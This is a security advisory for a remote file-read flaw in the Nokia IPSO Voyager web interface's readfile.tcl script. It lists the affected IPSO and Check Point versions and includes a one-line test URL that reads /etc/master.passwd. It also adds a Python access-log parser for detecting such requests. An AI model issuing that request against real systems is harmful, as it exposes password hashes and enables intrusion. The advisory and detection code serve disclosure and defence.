
Nokia IPSO Voyager ReadFile.TCL Remote File Read Vulnerability


Published: 2003-04-24
Updated: 2003-04-24
Severity:
Threat level: read restricted files
Error type: input validation error
Exploit mode: server mode

BUGTRAQ ID:7426

Affected systems
Nokia IPSO 3.3 SP4
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
Nokia IPSO 3.3 SP3
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
Nokia IPSO 3.3 SP2
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
Nokia IPSO 3.3 SP1
   + Check Point Software Firewall-1 4.1 SP1
Nokia IPSO 3.3
   + Check Point Software Firewall-1 4.1
   + Check Point Software VPN-1 4.1
Nokia IPSO 3.3.1
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
Nokia IPSO 3.4
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
Nokia IPSO 3.4.1
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
Nokia IPSO 3.4.2
   + Check Point Software Firewall-1 4.0
   + Check Point Software Firewall-1 4.0 SP1
   + Check Point Software Firewall-1 4.0 SP2
   + Check Point Software Firewall-1 4.0 SP3
   + Check Point Software Firewall-1 4.0 SP4
   + Check Point Software Firewall-1 4.0 SP5
   + Check Point Software Firewall-1 4.0 SP6
   + Check Point Software Firewall-1 4.0 SP7
   + Check Point Software Firewall-1 4.0 SP8
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
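Details
Nokia IPSO does not correctly handle some communication through Voyager; an attacker can access the interface to obtain some sensitive information.

The problem lies in the web GUI (Voyager) interface of the Nokia IPSO operating system: its readfile.tcl script lacks proper checks on user requests, which allows arbitrary files to be read.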

Test code
http://x.x.x.x/cgi-bin/readfile.tcl?file=/etc/master.passwd

Solution
None yet
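
For detection, requests of the form shown in the test URL can be found in the web server's access log. The following is an added example, not part of the original advisory: it assumes the log is in Common Log Format, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def find_readfile_requests(lines):
    """Return one dict per request that reached readfile.tcl with a file= parameter."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        src, when, method, target, status = m.groups()
        url = urlsplit(target)
        # Decode the path so %-encoded or mixed-case spellings of the script still match.
        script = unquote(url.path).lower().rsplit("/", 1)[-1]
        if script != "readfile.tcl":
            continue
        # parse_qs percent-decodes values; the parameter may be repeated.
        for path in parse_qs(url.query, keep_blank_values=True).get("file", []):
            hits.append({"src": src, "time": when, "file": path,
                         "status": int(status), "served": status == "200"})
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [24/Apr/2003:10:01:02 +0000] "GET /cgi-bin/home.tcl HTTP/1.0" 200 5120',
    '198.51.100.7 - - [24/Apr/2003:10:02:11 +0000] '
    '"GET /cgi-bin/readfile.tcl?file=/etc/master.passwd HTTP/1.0" 200 1843',
    '198.51.100.7 - - [24/Apr/2003:10:02:15 +0000] '
    '"GET /cgi-bin/ReadFile.TCL?file=%2Fetc%2Fmaster.passwd HTTP/1.0" 401 312',
    'garbage line',
]

if __name__ == "__main__":
    for hit in find_readfile_requests(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set to true means the server answered 200 for that file path, so the named file should be treated as disclosed.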

Related information
Jonas Eriksson <je@sekure.net>
Reference: http://www.securityfocus.com/archive/1/319575